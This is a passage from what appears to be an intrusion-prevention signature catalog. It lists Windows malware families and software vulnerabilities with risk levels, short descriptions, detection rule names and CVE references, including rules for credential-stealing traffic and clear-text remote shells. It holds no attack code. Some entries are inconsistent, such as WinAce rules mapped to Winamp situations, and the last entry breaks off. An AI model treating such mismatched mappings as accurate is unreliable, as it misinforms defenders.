Description:	Win32.Backdoor.Bifrose.IQ is a malware that targets Windows hosts. It can be used to open a backdoor on the infected machine.
Situation:	HTTP_CSU-Bifrose.IQ-Traffic

Win32.Backdoor.Golbrnd.A-Botnet

About this vulnerability:	Win32.Backdoor.Golbrnd.A botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Backdoor.Golbrnd.A is a ransomware that targets Windows hosts.
Situation:	HTTP_CSU-Golbrnd.A-Traffic

Win32.Backdoor.Heloag-Botnet

About this vulnerability:	Win32.Backdoor.Heloag botnet
Risk:	High
First detected in:	sgpkg-ips-697-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Backdoor.Heloag is a malware that targets Windows hosts. It can be used remotely access the infected host.
Situation:	HTTP_CRL_Heloag.A-Traffic

Win32.Backdoor.Hupigon-Botnet

About this vulnerability:	Win32.Backdoor.Hupigon botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Backdoor.Hupigon is a malware that targets Windows hosts. A remote attacker can use the malware to take remote control of the affected machine.
Situation:	Generic_CS-Hupigon.FI-Traffic HTTP_CSH-Hupigon.AIPM-Traffic

Win32.Backdoor.Pontoeb.A-Botnet

About this vulnerability:	Win32.Backdoor.Pontoeb.A botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Backdoor.Pontoeb.A is a malware that targets Windows hosts. It can be used to install additional unwanted files on the affected machine.
Situation:	HTTP_CRL-Pontoeb.A-Traffic

Win32.BankingTrojan.Torpplar.A-Botnet

About this vulnerability:	Win32.BankingTrojan.Torpplar.A botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.BankingTrojan.Torpplar.A is a malware that targets Windows hosts. It is used to steal credentials and payment information from the affected machine.
Situation:	HTTP_CRL-Torpplar.A-Traffic

Win32.Downloader.Loadmoney-Botnet

About this vulnerability:	Win32.Downloader.Loadmoney botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Downloader.Loadmoney is a malware that targets Windows hosts. It can be used to download additional unwanted files on the affected machine.
Situation:	HTTP_CRL-Loadmoney-Traffic

Win32.Downloader.Malat-Botnet

About this vulnerability:	Win32.Downloader.Malat botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Downloader.Malat is a malware that targets Windows hosts.
Situation:	HTTP_CSU-Malat-Traffic

Win32.Downloader.Microjoin.gen_C-Botnet

About this vulnerability:	Win32.Downloader.Microjoin.gen_C botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Downloader.Microjoin.gen_C is a malware that targets Windows hosts. It is used to download additional malware on the affected machine.
Situation:	HTTP_CRL-Microjoin.gen_C-Traffic File-Exe_Microjoin.gen_C-Download

Win32.Downloader.Multidropper-Botnet

About this vulnerability:	Win32.Downloader.Multidropper botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Downloader.Multidropper is a malware that targets Windows hosts. It is used to download additional malicious programs on the affected machine.
Situation:	E-Mail_Multidropper-Traffic

Win32.Downloader.Pabueri.A-Botnet

About this vulnerability:	Win32.Downloader.Pabueri.A botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Downloader.Pabueri.A is a malware that targets Windows hosts. It can be used to download additional malicious files on the affected machine.
Situation:	Generic_CS-Pabueri.A-Traffic

Win32.Downloader.Skyflas.A-Botnet

About this vulnerability:	Win32.Downloader.Skyflas.A botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Downloader.Skyflas.A is a malware that targets Windows hosts. It can be used to download additional unwanted files on the affected machine.
Situation:	File-GIF_Skyflas.A-Traffic

Win32.Downloader.Tijcont.A-Botnet

About this vulnerability:	Win32.Downloader.Tijcont.A botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Downloader.Tijcont.A is a malware that targets Windows hosts. It can be used to download additional malicious programs on the infected machine.
Situation:	HTTP_CSH-Tijcont.A-Traffic

Win32.PasswordStealer.Fareit-4-Botnet

About this vulnerability:	Win32.PasswordStealer.Fareit-4 botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.PasswordStealer.Fareit-4 is a malware that targets Windows hosts. It is used to steal user credentials.
Situation:	HTTP_CSH-Fareit-4-Traffic

Win32.PasswordStealer.Mantal.A-Botnet

About this vulnerability:	Win32.PasswordStealer.Mantal.A botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.PasswordStealer.Mantal.A is a malware that targets Windows hosts. The malware is used to steal the user's personal information.
Situation:	HTTP_CRL-Mantal.A-Traffic

Win32.ScareWare.CryptKeeper-Botnet

About this vulnerability:	Win32.ScareWare.CryptKeeper botnet
Risk:	High
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.ScareWare.CryptKeeper is a malware that targets Windows hosts. It locks the computer and asks for money to decrypt the data.
Situation:	HTTP_CRL_CryptKeeper.A-Traffic

Win32.ScareWare.Ransom.KC-Botnet

About this vulnerability:	Win32.ScareWare.Ransom.KC botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.ScareWare.Ransom.KC is a malware that targets Windows hosts.
Situation:	HTTP_CRL-Ransom.KC-Traffic

Win32.Spyware.Ranbyus.G-Botnet

About this vulnerability:	Win32.Spyware.Ranbyus.G botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Spyware.Ranbyus.G is a spyware that targets Windows hosts. The malware can be used to steal the user's personal information.
Situation:	HTTP_CS-Ranbyus.G-Traffic

Win32.Trojan.Avgesi-Botnet

About this vulnerability:	Win32.Trojan.Avgesi botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Avgesi is a malware that targets Windows hosts.
Situation:	HTTP_CSH-Avgesi.B-Traffic

Win32.Trojan.BadBind-Botnet

About this vulnerability:	Win32.Trojan.BadBind botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.BadBind is a malware that targets Windows hosts.
Situation:	HTTP_CSH-BadBind.A-Traffic

Win32.Trojan.Bumat-rts-Botnet

About this vulnerability:	Win32.Trojan.Bumat!rts botnet
Risk:	High
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Bumat!rts is a malware that targets Windows hosts.
Situation:	HTTP_CRL_Bumat-rts-Traffic

Win32.Trojan.Droidpak-Botnet

About this vulnerability:	Win32.Trojan.Droidpak botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Droidpak is a malware that targets Windows hosts.
Situation:	HTTP_CSH-Droidpak-Traffic

Win32.Trojan.Eupuds-Botnet

About this vulnerability:	Win32.Trojan.Eupuds botnet
Risk:	High
First detected in:	sgpkg-ips-697-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Eupuds is a malware that targets Windows hosts. It can be used to collect information on the infected machine and send it to a remote server.
Situation:	HTTP_CRL_Eupuds.A-Traffic

Win32.Trojan.Hanove.F-Botnet

About this vulnerability:	Win32.Trojan.Hanove.F botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Hanove.F is a malware that targets Windows hosts. It is used to decrypt and track traffic.
Situation:	HTTP_CRL-Hanove.F-Traffic

Win32.Trojan.Heur-Botnet

About this vulnerability:	Win32.Trojan.Heur botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Heur is an malware that targets Windows hosts.
Situation:	HTTP_CRL-Heur.LP-Traffic

Win32.Trojan.HeurGeneric-Botnet

About this vulnerability:	Win32.Trojan.HeurGeneric botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.HeurGeneric is a malware that targets Windows hosts.
Situation:	HTTP_CRL-HeurGeneric-Traffic

Win32.Trojan.Injector-2-Botnet

About this vulnerability:	Win32.Trojan.Injector-2 botnet
Risk:	High
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Injector-2 is a malware that targets Windows hosts. It is used to mask the actions of other malware.
Situation:	Generic_CS-Injector-2-Traffic

Win32.Trojan.Kovter.B-Botnet

About this vulnerability:	Win32.Trojan.Kovter.B botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Kovter.B is a malware that targets Windows hosts. The malware can be used to prevent access to the affected machine.
Situation:	HTTP_CRL-Kovter.B-Traffic

Win32.Trojan.Lumbko.A-Botnet

About this vulnerability:	Win32.Trojan.Lumbko.A botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Lumbko.A is a malware that targets Windows hosts. It can be used to collect information on the infected machine and send it to a remote server.
Situation:	HTTP_CRL-Lumbko.A-Traffic

Win32.Trojan.Psyme.Gen-Botnet

About this vulnerability:	Win32.Trojan.Psyme.Gen botnet
Risk:	High
First detected in:	sgpkg-ips-693-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Psyme.Gen is a malware that targets Windows hosts. It can be used to download additional files on the affected machine.
Situation:	HTTP_CRL-Psyme.Gen-Traffic

Win32.Trojan.Scar.O-Botnet

About this vulnerability:	Win32.Trojan.Scar.O botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Scar.O is a trojan that targets Windows hosts. The malware is controlled from a remote server.
Situation:	HTTP_CRL-Scar.O-Traffic

Win32.Trojan.SHeur4.BHUE-Botnet

About this vulnerability:	Win32.Trojan.SHeur4.BHUE botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.SHeur4.BHUE is a Trojan that targets Windows hosts. The malware can be used to steal the user's personal information and download additional malicious files on the affected machine.
Situation:	HTTP_CRL-SHeur4.BHUE-Traffic

Win32.Trojan.Simda.bqz-Botnet

About this vulnerability:	Win32.Trojan.Simda.bqz botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Simda.bqz is a malware that targets Windows hosts. It can be used to collect information on the infected machine and send it to a remote server.
Situation:	HTTP_CRL-Simda.bqz-Traffic

Win32.Trojan.Smoaler-Botnet

About this vulnerability:	Win32.Trojan.Smoaler botnet
Risk:	High
First detected in:	sgpkg-ips-690-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Smoaler is a trojan that targets Windows hosts. The malware is controlled from a remote server, and it can be used to download and execute additional malicious files on the infected machine.
Situation:	HTTP_CRL-Smoaler.C-Traffic HTTP_CRL-Smoaler.B-Traffic

Win32.Trojan.Sydigu-Botnet

About this vulnerability:	Win32.Trojan.Sydigu botnet
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Sydigu is a malware that targets Windows hosts. It steals user information from the affected machine and sends it encrypted to a remote server.
Situation:	Generic_CS-Sydigu.A-Traffic

Win32.Trojan.Tobfy-Botnet

About this vulnerability:	Win32.Trojan.Tobfy botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Tobfy is a ransomware that targets Windows hosts.
Situation:	HTTP_CRL-Tobfy-Traffic

Win32.Trojan.Xorpix.bh-Botnet

About this vulnerability:	Win32.Trojan.Xorpix.bh botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Xorpix.bh is a trojan that targets Windows hosts. The malware is controlled from a remote server, and it can be used for example to send spam mail.
Situation:	HTTP_CRL-Xorpix.bh-Traffic

Win32.Trojan.Zusy.24405-Botnet

About this vulnerability:	Win32.Trojan.Zusy.24405 botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Trojan.Zusy.24405 is a malware that targets Windows hosts. The malware can be used to collect private information on the affected machine.
Situation:	HTTP_CRL-Zusy.24405-Traffic

Win32.Virus.Obfuscator.AJK-Botnet

About this vulnerability:	Win32.Virus.Obfuscator.AJK botnet
Risk:	High
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Virus.Obfuscator.AJK is a malware that targets Windows hosts.
Situation:	HTTP_CRL_Obfuscator.AJK-Traffic

Win32.Worm.Mofei.P-Botnet

About this vulnerability:	Win32.Worm.Mofei.P botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Worm.Mofei.P is a malware that targets Windows hosts.
Situation:	HTTP_CS-Mofei.P-Traffic

Win32.Worm.Taterf.B-Botnet

About this vulnerability:	Win32.Worm.Taterf.B botnet
Risk:	High
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Win32.Worm.Taterf.B is a worm that targets Windows hosts. It can be used to steal personal information.
Situation:	HTTP_CSU-Taterf.B-Traffic

Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1109-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an elevation of privilege vulnerability in Microsoft Windows. Successful exploitation of this vulnerability may lead in arbitrary code execution in kernel mode.

Situation:

File-Exe_Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453

References:

CVE-2018-8453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8453

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Winace-Rar-And-Tar-Directory-Traversal-Vulnerability

About this vulnerability:

A vulnerability in e-Merge WinAce

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

WinAce

Type:

Malfunction

Description:

There exists a directory traversal vulnerability in the WinACE application. The flaw is caused by improper handling of the path name of archived files in TAR and RAR archives. By persuading a user to open a crafted archive with the affected application, an attacker may place files in arbitrary locations on the target system, which may lead to code execution. Exploitation of this vulnerability will generally result in the creation and/or overwriting of arbitrary files on the target file system. File system access is dependent on the privileges of the currently logged in user. The behaviour of the target system highly depends on the intention of the attacker. If the currently logged in user has permission to overwrite system files, the operating system stability may be affected if critical system files are overwritten.

Situation:

HTTP_SS-Winamp-Id3v2-Tag-Handling-Buffer-Overflow
File-Binary_Winamp-Id3v2-Tag-Handling-Buffer-Overflow

References:

CVE-2006-0981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0981

BID-16800
http://www.securityfocus.com/bid/16800

OSVDB-23464
http://www.osvdb.org/23464

Winamp-Id3v2-Tag-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in NullSoft Winamp

Risk:

Moderate

First detected in:

sgpkg-ips-355-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Winamp

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Winamp. The vulnerability is caused due to a boundary error in the handling of ID3v2 tags. A remote attacker can exploit the vulnerability by enticing the victim to add a malicious MP3 file to the playlist and play it. The exploitation of the vulnerability can cause a denial of service or the execution of arbitrary code with privileges of the currently logged in user.

Situation:

References:

CVE-2005-2310
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2310

BID-14276
http://www.securityfocus.com/bid/14276

OSVDB-17897
http://www.osvdb.org/17897

Winamp-In-CDDA.dll-Buffer-Overflow

About this vulnerability:	A vulnerability in Winamp
Risk:	High
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Winamp
Type:	Buffer Overflow
Description:	A vulnerability exists in the way Winamp parses playlist files and CD audio files. If a playlist file contains an overly long reference to a file in CD audio format (with a .cda extension) or a CD audio file has a long filename, a buffer overflow can occur in the component IN_CDDA.dll. An attacker can exploit this vulnerability to execute arbitrary code on a vulnerable system by enticing a user to open a specially crafted playlist file or CD audio file.
Situation:	File-TextId_Winamp-In-CDDA.dll-Buffer-Overflow

Winamp-Playlist-Buffer-Overflow

About this vulnerability:

Winamp .pls playlist buffer overflow

Risk:

High

First detected in:

sgpkg-ips-57-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Winamp

Type:

Buffer Overflow

Description:

Winamp player version 5.12 is vulnerable to a playlist buffer overflow. Each filename in a playlist is copied into a fixed-size buffer without checking the actual length of the filename. Using a filename longer than 1024 bytes causes a buffer overflow. Arbitrary remote code execution is possible via the flaw. The Winamp player creates file extension associations for playlist files when installed, so the player automatically opens playlist files when they are downloaded or opened. Internet radio stations may also use playlist files to give listeners the URLs of their servers.

Situation:

HTTP_SS-Winamp-Playlist-Buffer-Overflow
File-TextId_Winamp-Playlist-Buffer-Overflow

References:

CVE-2006-0476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0476

BID-16410
http://www.securityfocus.com/bid/16410

OSVDB-22789
http://www.osvdb.org/22789

Winamp-XM-File-Heap-Overflow

About this vulnerability:	A vulnerability in Winamp
Risk:	High
First detected in:	sgpkg-ips-416-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Winamp
Type:	Buffer Overflow
Description:	There is a buffer overflow in the .XM file type decoded within Winamp, a popular media file player for the Windows Operating System developed by Nullsoft Corporation. The exploitation of this buffer overflow can lead to the execution of arbitrary code on the remote machine in the context of the user running Winamp.
Situation:	File-TextId_Winamp-XM-File-Heap-Overflow

WinCC-Hmiload-Exe-Directory-Traversal

About this vulnerability:	A vulnerability in Siemens SIMATIC WinCC
Risk:	High
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Siemens SIMATIC WinCC
Type:	Directory Traversal
Description:	There is a directory traversal vulnerability in WinCC, which allows remote code excution.
Situation:	Generic_CS-WinCC-Hmiload-Exe-Directory-Traversal

WinComLPD-Total-Integer-Overflow

About this vulnerability:

WinComLPD Total Integer Overflow

Risk:

High

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WinComLPD Total

Type:

Integer Overflow

Description:

An integer overflow vulnerability in WinComLPD Total 3.0.2.623 which allows attackers to remotly execute arbitrary code.

Situation:

Generic_CS-WinComLPD-Total-Integer-Overflow

References:

CVE-2008-5159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5159

BID-27614
http://www.securityfocus.com/bid/27614

OSVDB-42861
http://www.osvdb.org/42861

Windfind

About this vulnerability:	WindFind
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WindFind
Type:	Misconfiguration
Description:	WindFind is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Windfind

Windows-Command-Prompt

About this vulnerability:	Windows command prompt transferred in clear text
Risk:	High
First detected in:	sgpkg-ips-65-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	A Windows command prompt was transferred in clear text. This may indicate that a Windows machine has been successfully exploited and a shell connection has been established.
Situation:	Shared_CS-Windows-Command-Prompt Shared_SS-Windows-Command-Prompt

Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689

About this vulnerability:

An attempt to exploit a vulnerability in Windows CryptoAPI detected

Risk:

High

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

By exploiting this vulnerability in the Windows CryptoAPI, an attacker could manipulate an existing public X.509 certificate to spoof their identity and perform actions such as authentication or code signing as the targeted certificate.

Situation:

TLS_SS_Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689

References:

CVE-2022-34689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34689

Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416

About this vulnerability:

A vulnerability in Microsoft Windows Cryptographic Services

Risk:

High

First detected in:

sgpkg-ips-1565-5242

Last changed:

sgpkg-ips-1565-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Windows Cryptographic Services detected.

Situation:

File-Binary_Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416

References:

CVE-2023-23416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23416

ms23-mar
http://technet.microsoft.com/security/bulletin/ms23-mar

Windows-Dnsapi-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-1076-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an out-of-bounds write vulnerability in Windows DNSAPI. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

DNS-TCP_Windows-Dnsapi-Remote-Code-Execution-Vulnerability

References:

CVE-2018-8225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8225

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Windows-Elevation-Of-Privilege-CVE-2017-0024

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Windows.

Situation:

File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0024

References:

CVE-2017-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0024

MS17-018
http://technet.microsoft.com/security/bulletin/MS17-018

Windows-Elevation-Of-Privilege-CVE-2017-0026

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Windows.

Situation:

File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0026

References:

CVE-2017-0026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0026

MS17-018
http://technet.microsoft.com/security/bulletin/MS17-018

Windows-Elevation-Of-Privilege-CVE-2017-0050

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Windows.

Situation:

File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0050

References:

CVE-2017-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0050

MS17-017
http://technet.microsoft.com/security/bulletin/MS17-017

Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

There exists a elevation of privilege vulnerability in Microsoft Windows.

Situation:

File-Text_Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040

References:

CVE-2016-0040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0040

MS16-014
http://technet.microsoft.com/security/bulletin/MS16-014

Windows-Environment-Variables-In-Script

About this vulnerability:	Known Windows Environment Variables in website scripts
Risk:	Moderate
First detected in:	sgpkg-ips-830-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	References to Windows Environment Variables within website scripting may indicate attempts to access the operating system through browser vulnerabilities.
Situation:	File-Text_Windows-Environment-Variables-In-Script

Windows-Explorer-HTA-CLSID-System-Compromise

About this vulnerability:

Windows Explorer HTA CLSID system compromise vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-75-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows XP SP1; Windows XP SP2; Windows 2003

Software:

<os>

Type:

Directory Traversal

Description:

Windows Explorer suffers from a vulnerability where script files can be executed without security restrictions. Files whose extension is a CLSID defined in Windows registry are recognized and executed with a specified program. In the case of HTA files with the CLSID {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} mshta.exe is executed. If the filename contains URI-encoded directory traversal sequences, mshta.exe will normalize it and open a file in a different directory without security restrictions. This allows remote attackers to execute arbitrary code by enticing users to open a malicious file with Windows Explorer, possibly over WebDAV or SMB shares.

Situation:

HTTP_CSU-Windows-Explorer-HTA-CLSID-System-Compromise-2
HTTP_CS-Windows-Explorer-HTA-CLSID-System-Compromise
SMB-TCP_Windows-Explorer-HTA-CLSID-System-Compromise

References:

CVE-2006-3281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3281

BID-19389
http://www.securityfocus.com/bid/19389

MS06-045
http://technet.microsoft.com/security/bulletin/MS06-045

Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464

About this vulnerability:

A vulnerability in Windows Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-930-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in the way Windows Explorer handles LNK files.

Situation:

File-Binary_Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464

References:

CVE-2017-8464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464

ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun

Windows-Filename-Parsing-Vulnerability-CVE-2012-4774

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-497-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit vulnerability in Microsoft Windows was detected

Situation:

SMB-TCP_Windows-Filename-Parsing-Vulnerability-2

References:

CVE-2012-4774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4774

OSVDB-88313
http://www.osvdb.org/88313

MS12-081
http://technet.microsoft.com/security/bulletin/MS12-081

Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812

About this vulnerability:

A vulnerability in Windows Group Policy Preferences

Risk:

High

First detected in:

sgpkg-ips-1308-5242

Last changed:

sgpkg-ips-1308-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

